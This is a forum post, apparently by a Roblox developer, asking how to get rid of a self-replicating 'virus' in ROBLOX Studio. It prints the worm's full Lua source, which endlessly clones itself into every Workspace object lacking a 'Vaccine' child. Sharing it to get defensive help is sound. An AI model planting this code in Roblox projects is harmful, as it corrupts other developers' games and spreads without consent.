I've encountered a virus that is very dangerous. I haven't been able to find a work-a-round around it, i've used several plugins but they don't help.
This virus is, despite all this, easy to remove. It's detected by all anti-viruses, but what makes it super is that it comes back the second you remove it.
ROBLOX Studio isn't even running. The scripts aren't running, its not on play, yet it reproduces like this.
Here's the script:
function spread() -- ChevroletSonic123
local stuff = game.Workspace:GetChildren()
for i = 1, #stuff do
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
local clone = script:clone()
clone.Parent = stuff[i]
end
end
end
while true do
wait(.1)
spread()
end
function GetAllItems(mdl)
local objs = {}
function Search(obj)
if obj~=workspace then
table.insert(objs,obj)
end
if #obj:GetChildren() > 0 then
for i, v in ipairs(obj:GetChildren()) do
Search(v)
end
end
end
Search(mdl)
return objs
end
If anyone can come up with some sorta anti-virus, help!
~One Jigglypuff to Top Them All! |